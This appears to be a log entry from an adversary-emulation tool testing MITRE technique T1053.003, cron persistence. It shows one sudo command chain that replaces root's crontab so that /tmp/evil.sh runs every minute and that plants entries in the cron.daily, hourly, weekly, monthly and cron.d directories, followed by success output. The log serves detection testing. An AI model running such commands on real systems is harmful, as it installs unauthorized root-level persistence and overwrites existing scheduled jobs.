[+] Tactic ID   : T1053.003
[+] Technique   : Scheduled Task/Job: Cron
[+] Command     :
sudo systemctl start crond || sudo systemctl start cron && sudo systemctl enable crond || sudo systemctl enable cron && sudo crontab -l > /tmp/notevil && echo '* * * * * /tmp/evil.sh' | sudo tee /tmp/persistevil > /dev/null && sudo crontab /tmp/persistevil && echo "echo 'Hello from SISA Team' > /tmp/SISA.log" | sudo tee /etc/cron.daily/persistevil /etc/cron.hourly/persistevil /etc/cron.monthly/persistevil /etc/cron.weekly/persistevil > /dev/null && echo '*/5 * * * * root echo "Hello from SISA Team" > /tmp/SISA.log' | sudo tee /etc/cron.d/persistevil > /dev/null && (sudo crontab -l 2>/dev/null; echo "*/5 * * * * echo 'Hello from SISA Team' > /tmp/SISA.log") | sudo crontab -
[+] Success
----- OUTPUT START -----
Backup of root's previous crontab saved to /root/.cache/crontab/crontab.bak
Backup of root's previous crontab saved to /root/.cache/crontab/crontab.bak
----- OUTPUT END -----
